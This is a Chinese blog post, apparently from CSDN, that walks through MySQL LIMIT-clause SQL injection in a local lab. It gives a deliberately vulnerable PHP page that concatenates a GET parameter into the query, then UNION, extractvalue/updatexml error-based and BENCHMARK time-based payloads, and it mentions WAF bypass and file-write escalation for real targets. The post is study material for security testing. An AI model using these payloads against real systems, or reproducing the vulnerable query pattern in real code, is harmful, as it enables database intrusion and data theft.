mysql注入之limit 注入

最新推荐文章于 2023-09-25 16:18:22 发布
最新推荐文章于 2023-09-25 16:18:22 发布
阅读量4.4k 收藏 7
点赞数 2
文章标签: mysql注入 limit order by
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wy_97/article/details/114364030
版权 
文章首发公众号:闪光的自留地
知乎:Sp4rkW
GITHUB:Sp4rkW
B站:一只技术君
博客:https://sp4rkw.blog.csdn.net/
联系邮箱:getf_own@163.com

limit注入基本常见的分两种场景,存在order by与否,本文将复现尝试各种limit注入的姿势与讨论不同mysql版本对注入payload的影响。作者能力有限,有更多思路欢迎讨论(微信没有开通讨论区,可以直接给我的公众号私信,都会看的)

复现环境:

使用到的系统版本
centos7.2.1511
宝塔面板7.5.1
PHP5.6
MYSQL5.1.73
MYSQL5.7.33

不存在order by

环境页面构建

首先构造一个存在漏洞的php页面,源码如下:

<?php 
$con=mysqli_connect("127.0.0.1","root","xxx","127_0_0_1");
if (mysqli_connect_errno())
{
	echo "数据库连接出错:".mysql_connect_error();
}
$id=$_GET["id"];
$result=mysqli_query($con,"select * from runoob_tbl limit $id,1");

if (!$result) {
    printf("Error: %s\n", mysqli_error($con));
    exit();
}
$row=mysqli_fetch_array($result);
echo $row['runoob_id']." | ".$row['runoob_title']." | ".$row['runoob_author'];
echo "<br>";
 ?>

数据库环境如下:
在这里插入图片描述

常规注入

利用union联合查询即可做到:

http://127.0.0.1:8081/sql-limit.php?id=2,0 union select 1,2,user(),4%23

实战环境下,后续考虑各种waf绕过即可,进一步利用即可考虑写文件提权操作

存在order by

环境页面构建

数据库结构一致,php代码变动了一些,变化如下:

<?php 
$con=mysqli_connect("127.0.0.1","root","3855218a7b4eea3c","127_0_0_1");
if (mysqli_connect_errno())
{
	echo "数据库连接出错:".mysql_connect_error();
}
$id=$_GET["id"];
$result=mysqli_query($con,"select * from runoob_tbl order by runoob_id limit $id,1");

if (!$result) {
    printf("Error: %s\n", mysqli_error($con));
    exit();
}
$row=mysqli_fetch_array($result);
echo $row['runoob_id']." | ".$row['runoob_title']." | ".$row['runoob_author'];
echo "<br>";
 ?>

注入思路

尝试同样的payload

http://127.0.0.1:8081/sql-limit.php
?id=2,0 union select 1,2,user(),4%23

# 报错
Error: Incorrect usage of UNION and ORDER BY

实战中根据报错可以判断limit前方存在order by,如果是开发的时候遇到这种报错,加上括号即可解决,但是我们构造payload最多只能构造一半的payload。

前提条件:

  • 5.0.0< MySQL <5.6.6版本

参考文章:Mysql下Limit注入方法

SELECT 
[ALL | DISTINCT | DISTINCTROW ] 
  [HIGH_PRIORITY] 
  [STRAIGHT_JOIN] 
  [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT] 
  [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] 
select_expr [, select_expr ...] 
[FROM table_references 
[WHERE where_condition] 
[GROUP BY {col_name | expr | position} 
  [ASC | DESC], ... [WITH ROLLUP]] 
[HAVING where_condition] 
[ORDER BY {col_name | expr | position} 
  [ASC | DESC], ...] 
[LIMIT {[offset,] row_count | row_count OFFSET offset}] 
[PROCEDURE procedure_name(argument_list)] 
[INTO OUTFILE 'file_name' export_options 
  | INTO DUMPFILE 'file_name' 
  | INTO var_name [, var_name]] 
[FOR UPDATE | LOCK IN SHARE MODE]]

值得注意的一点是:当时提到的5.x版本通用指的是15年,在5.6.6版本之后,mysql官方对analyse语句进行了改写。

procedure后面可以支持报错注入以及时间盲注

# extractvalue 报错注入
http://127.0.0.1:8081/sql-limit.php
?id=2,0 procedure analyse(extractvalue(rand(),concat(0x3a,user())),1);%23

# updatexml 报错注入
http://127.0.0.1:8081/sql-limit.php
?id=2,0 procedure analyse(updatexml(1,concat(0x3a,user()),1),1);%23

# 对于无法报错注入的,可以结合来进行时间盲注
http://127.0.0.1:8081/sql-limit.php
?id=2,0 procedure analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1);%23

PS:时间盲注这里不支持sleep,可以使用BENCHMARK
BENCHMARK主要用于测试多次进行某个操作所耗费的时间,这里用于做时间盲注的时间区别函数

切换成mysql 5.7.33版本之后无法执行,直接报错

Sp4rkW
关注
专栏目录
【漏洞挖掘】——127、 Limit注入刨析
Fly_鹏程万里
07-03 231
此方法适用于MySQL 5.x中,在limit语句后面的注入,常见的后台SQL语句如下所示:上面语句包含了ORDER BY,MySQL中UNION语句不能在ORDER BY的后面,不然这里利用UNION就可以很容易的读取数据了,下面看看在MySQL 5中的SELECT语法:从上面可以看到在LIMIT后面可以跟一个函数——PROCEDURE,那么使用PROCEDURE函数能否注入呢?
mysql+limit+sql注入_Sql注入limit注入的学习
weixin_33110431的博客
01-19 152
0x01 前言今天听学长们交流漏洞挖掘的经验,提到了Limit注入,借此来学习一下limit注入0x02 知识介绍limitLIMIT[位置偏移量,]行数其中,中括号里面的参数是可选参数,位置偏移量是指MySQL查询分析器要从哪一行开始显示,索引值从0开始,即第一条记录位置偏移量是0,第二条记录的位置偏移量是1,依此类推...,第二个参数为“行数”即指示返回的记录条数。效果如图 自行理解bench...
mysql+limit+sql注入_sql注入limit注入和五种时间盲注姿势
weixin_28803437的博客
01-19 657
0x00前言limit注入和时间前面也提过一点点了,真的非常简单,真不太想单独写一个这个来水博客。。这里还是记录一下吧以后忘了方便复习。0x01 limit基础知识照抄前面的:这里简单记录一下我自己经常会忘的知识点,觉得不值得再写一篇博客去水了233使用查询语句的时候,经常要使用limit返回前几条或者中间某几行数据SELECT*FROMtableLIMIT[offset,]rows...
MysqlLimit注入方法(此方法仅适用于5.0.0<mysql<5.6.6的版本)
weixin_34115824的博客
07-27 200
SQL语句类似下面这样:(此方法仅适用于5.0.0<mysql<5.6.6的版本) SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT注入点) 问题的关键在于,语句中有 order by 关键字,mysql 中在 order by 前面可以使用 union 关键字,所以如果注入点前面没有 order b...
mysqllimit注入
cherrie007的博客
07-27 4548
[转载]MysqlLimit注入方法
mysql limit后的注入
ztaos的博客
12-04 631
mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1); 例子:http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0&num=1    procedure
mysql limit 注入_[转载]MysqlLimit注入方法
weixin_30394975的博客
01-26 366
欢迎来到阿八个人博客网站。本阿八个人博客网站提供最新的站长新闻,各种互联网资讯。喜欢本站的朋友可以收藏本站,或者加QQ:我们大家一起来交流技术!URL链接:https://www.abboke.com/rz/2019/1010/116748.html很长一段时间我、以及很多同学认为“mysql limit后的注入点”是没办法解决的难题,但这次真的被解决了。我很少转载文章,这次再破个例。原文:ht...
PHP+MYSQL 注入靶场
最新发布
04-26
在PHP+MYSQL注入靶场中,PHP文件(如`index.php`)处理用户请求并与MySQL数据库交互。如果PHP代码没有正确地转义或预处理用户输入,就可能导致SQL注入漏洞。例如,直接拼接用户输入到SQL查询中,而不是使用参数化...
mysql注入-sqlilabs靶场注入
10-15
MySQL注入是一种常见的网络安全漏洞,主要发生在应用程序中,当用户输入的数据未经充分验证或过滤就直接用于构造SQL查询时。SQL注入攻击者可以利用这个漏洞执行恶意的SQL命令,获取、修改、删除数据库中的敏感信息,...
【小迪安全day13】WEB漏洞——SQL注入MYSQL注入
RichUee的博客
12-05 1358
MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。
Sql注入limit注入的学习
bylfsj的博客
03-19 2666
0x01 前言 今天听学长们交流漏洞挖掘的经验,提到了Limit注入,借此来学习一下limit注入 0x02 知识介绍 limit LIMIT[位置偏移量,]行数 其中,中括号里面的参数是可选参数,位置偏移量是指MySQL查询分析器要从哪一行开始显示,索引值从0开始,即第一条记录位置偏移量是0,第二条记录的位置偏移量是1,依此类推...,第二个参数为“行数”即指示返回的记录条数。 效果如...
sql-lab关于limit注入(网络信息安全实验室 第四题)
weixin_43803070的博客
04-27 2006
关于limit注入(记一次sql注入) 1.函数解释 MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是ExtractValue()和UpdateXML() 1)extractvalue():从目标XML中返回包含所查询值的字符串。   EXTRACTVALUE (XML_document, XPath_string);   第一个参数:XML_document是Str...
order by/limit 注入
阿金正传
04-19 2005
类似的代码 php code SELET * FROM page WHERE id=1 ORDER BY id [参数] ASC [参数] LIMIT 10,10 [参数] [参数] – 为存在注入的参数 我们不能在这注入上使用union,所以我们只能使用其他我们可以利用的   在order by id [参数] 之后使用双重查询   假设有以下网站 code: http://
SQL注入order by注入limit注入
m0_46467017的博客
08-09 4759
MySQL支持使用ORDER BY语句对查询结果集进行排序处理,使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。语法格式如下select * from 表名 order by 列名(或者数字) asc;升序(默认升序) select * from 表名 order by 列名(或者数字) desc;降序假设有以下用户表当我们使用命令的时候,是将users这张表按照username这一列进行升序,结果就变成了;...
limit注入
左手诗人 右手剑客
07-07 186
page=4%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1);%23
MySQLLIMIT 条件后注入
weixin_30535913的博客
06-14 158
from:https://rateip.com/blog/sql-injections-in-mysql-limit-clause/ 此方法适用于MySQL 5.x中,在limit语句后面的注入例如: SELECT [ALL|DISTINCT|DISTINCTROW] [HIGH_PRIORITY] [STRAIGHT_JOIN]...
SQL特殊位置注入order注入limit注入
fly_enum的博客
09-25 1286
平常在做测试的过程中,我们经常遇到的sql注入点一般是在where语句后面,但是偶尔也会遇到注入点在order by和limit。这两个位置由于其有一些特殊性,导致一些注入方式不能使用。下面就一起来看看这两个位置如何去注入
mybatis limit注入修复
09-01
Mybatis是一款流行的Java持久化框架,它使用了SQL映射文件来定义数据库操作。其中的limit注入是指在SQL语句中使用limit关键字来限制查询结果的返回数量,从而实现分页查询。 然而,limit注入可能存在一些安全隐患,容易受到恶意用户的攻击。为了修复这个问题,我们可以采取以下几个步骤: 1. 参数校验:在接收客户端传递的limit参数之前,需要进行严格的参数校验。确保参数的合法性,比如限制传入参数的范围、类型等。 2. 参数绑定:使用Mybatis提供的参数绑定功能来绑定limit参数。这样可以确保limit参数的值是安全可靠的,避免恶意用户通过传入非法参数对数据库进行攻击。 3. 预编译语句:在设置limit参数之前,使用Mybatis的预编译语句功能来对SQL语句进行预处理。这样可以防止恶意用户通过注入攻击修改SQL语句的结构或逻辑。 4. 日志输出:启用Mybatis的日志输出功能,将SQL语句的执行过程输出到日志文件中。这样可以对SQL注入攻击进行监控,并及时发现异常情况。 通过以上措施,我们可以修复Mybatis中的limit注入问题,提高系统的安全性。同时,建议在使用Mybatis时及时更新框架版本,以获取最新的安全补丁和功能改进。此外,也可以结合其他安全框架或工具来进一步加强系统的安全性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值